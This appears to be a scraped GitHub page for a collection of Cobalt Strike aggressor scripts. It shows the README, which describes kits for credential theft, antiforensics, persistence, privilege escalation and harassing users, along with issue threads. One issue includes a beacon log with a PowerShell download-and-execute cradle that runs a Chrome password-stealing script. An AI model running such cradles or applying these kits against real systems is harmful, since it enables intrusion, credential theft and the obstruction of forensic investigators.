und3rf10w / aggressor-scripts Goto Github PK

View Code? Open in Web Editor NEW

398.0 28.0 94.0 2.87 MB

Aggressor scripts I've made for Cobalt Strike

License: GNU General Public License v2.0

Shell 1.45% PowerShell 98.49% Slash 0.06%

aggressor-scripts's Introduction

Aggressor Scripts

This is just a random collection of Aggressor Scripts I've written for Cobalt Strike 3.x.

Please note that most of them could probably use some tweaking to better suit your environment/tactics.

Shoot me any questions and feel free to submit a pull request for any improvements you may have!

Using this repository

I make use of git submodules, so clone this repo with git clone --recursive

If you didn't follow my instructions and already cloned the repo, go to the root of the repo and run git submodule update --init --recursive

Kits

Most of the useful scripts here are organized in kits. All you have to do is load the KitLoader.cna script, and it will automatically load all other kits (execpt the DebugKit).

Kit descriptions

AnnoyKit

Actions in this kit center around miscellaneous fun that generally involve messing with the user

AntiForensicsKit

Actions in this kit center around antiforensics. If it slows an investigator down, it likely belongs in this kit. We all know antiforensics is best forensics.

CredKit

Actions in this kit center around credential theft, be it via memory scraping or reading files in. If it involves stealing passwords, it should be here.

DebugKit

This kit is limited to actions that I use for development and debugging, and thus is not loaded with the rest of them.

EnumKit

Actions in this kit center around host and network enumeration. Credential enumeration actions should go in CredKit instead.

PersistKit

Actions in this kit center around endpoint persistence. Examples include backdoor service creation, backdoor process creation, etc

PrivEscKit

Actions in this kit center around endpoint privilege escalation. Actions that involve forceful scanning (powerup.ps1, unix-privesc-check) should go in the apporiate section

ThirdParty This is is just a random collection of .cna scripts that other people have created that I like to use. I just have it loaded with kitloader for conveience. There may be changes to the third party scripts to better integerate with my workflow.

Other scripts

inveigh/

Runs Inveigh against the selected machine(s) for a specified amount of time. This does automatically enable LLMNR and NBNS spoofing.

Ebowla/

Adds interoperability between Cobalt Strike and Ebowla. I plan on making this process much more integrated and automated, but at this time, you can generate an Ebowla payload within Cobalt Strike by going to Attacks -> Generate Ebowla Payload. See ewbowla-interop.cna for instructions.

Pushover/

Pushover support for Cobalt Strike, ridiculously useful.

See pushover-cs for instructions.

Reports/

These are reporting (.rpt) scripts created for Cobalt Strike.

aggressor-scripts's People

Contributors

Stargazers

Watchers

Forkers

volt72 redsec-shay uppentest mytts c0ns0le eniac888 lucabongiorni kazimer vysecurity tuian mandreko taylorwin rkornmeyer cybertroyeu zacharyhenson syphersec gabemarshall h1d3r retbandit-zz netbiosx ausec eltorobiz oscommonjs aldaw0lf w9hax quikilr merkjinx mehrdad-shokri r3dfruitrollup r3p3r capitaogancho yeyintminthuhtut epic-kaso orf53975 fogsec akur-8 gitlabsyncint michaelroberts98 martin407 bravery9 alex-dengx vaginessa h4554nalmusajjen thered attackgithub sopsmattw ajohnston9 modulexcite qsdj flatl1neapt vincentdthe liufeng-take m4rm0k 0x556c7472614861636b6572 ra0mb1er xiao5gee tloebner arasteus imulmul marciopocebon a3imuth topotam sts0mrg0 l1ves kuluary slooppe thesubtlety wolfking2 5l1v3r1 khr0x40sh lotus321 v4nyl invokethreatguy reanimat0r fuckup1337 zforks rassec thorkel77 oldkingcone vboomshaka gavz 3453-315h noodled tai-rex xundididi tmcmil nusiloot apkc ethicalsecurity-agency op0ssum

aggressor-scripts's Issues

Load error

When I attempt to load this script into Cobalt Strike via the Script Manager I receive the following error "Could not load...... Error: Syntax error at line 29 beacon_command-register"

Fix the "Browse..." button in ebowla-interop.cna

The "Browse..." button in ebowla-interop.cna currently does not function. However, if a valid path is entered in the text box, everything will function as normal.

Whatever fix is done for this should simply replace the value in $textFieldPayloadInput using

[$textFieldPayloadInput setText: /path/to/input/payload];

Get-ChromePasswords.ps1 fails (maybe size?)

I was troubleshooting the ChromePasswords script, and getting an interesting error in CobaltStrike:

beacon> powershell-import Get-ChromePasswords.ps1
beacon> powerpick Get-ChromePasswords
[*] Tasked beacon to run: IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:43763/'))
[+] host called home, send: 135753 bytes
[+] received output:
ERROR: downloadstring : Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the
ERROR: remote server"
ERROR:
ERROR: At line:1 char:121
ERROR: + IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:28023/'); IEX ((new-object net.we
ERROR: bclient).downloadstring <<<< ('http://127.0.0.1:43763/'))
ERROR:    + CategoryInfo        : NotSpecified: (:) [], MethodInvocationException
ERROR:    + FullyQualifiedErrorId : DotNetMethodException
ERROR:

I initially figured something was just wrong with the script and moved on. Later, I analyzed the script, and found that there were two "F"s in the word "FFunction". After fixing that, I did:

beacon> powershell-import
[-] max powershell import size is 1MB. Compressed script is: 2538520 bytes

It could just be how I'm running it, but it hasn't succeeded in any fashion I've tried. I haven't yet resolved it though. Maybe you want to test it and see if it works for you? Maybe something has changed.

ntfsADSBackdoor.cna will not load

When I attempt to load this into Cobalt Strike via the Scripting Manager I receive the following error "unknown expression at line 21 : txt and unknown expression at line 21: adfjklbalgjbr"

Reorganize beacon menus for proper SSH support

Currently, all SSH commands are incorrectly added in this repository.

For example, see the credKit:

popup beacon_bottom {
    menu "CredKit" {
        menu "Windows" {
            # < ... snip ... >
        }
        menu "Linux" {
            # < ... snip ... >
        }
    }
}

In the current state, if an operator were to right click on a SSH beacon, they would not see any of the commands within the kit. This is because ssh and beacon are different popup hooks. The proper format is as follows:

popup beacon_bottom {
    menu "CredKit" {
        # all Windows commands go here
    }
}

popup ssh {
    menu "CredKit" {
        # all SSH commands go here
    }
}

This modification needs to be performed for all kits. This also eliminates the need to separate the SSH and Windows commands within the menu.

Bug in Persist-Poweliks.ps1

There is a bug in Persist-Poweliks.ps1 that prevents the payload from executing on boot. Need to investigate further.

postExploit: convert Chrome and Firefox password scripts

The scripts Get-ChromePasswords.ps1 and Get-FirefoxPasswords.ps1 are too large to be imported through bpowershell_import().

Convert them to be hosted using the bhost_script() subroutine and execute that way.

Tasks

add bhost_script() topostExploit.cna (currently in privesc branch)
Convert Get-ChromePasswords.ps1 to use bhost_script()
Convert Get-FirefoxPasswords.ps1 to use bhost_script()

Fix Ebowla-interop.cna

Ebowla-interop.cna doesn't actually work. You should probably fix it.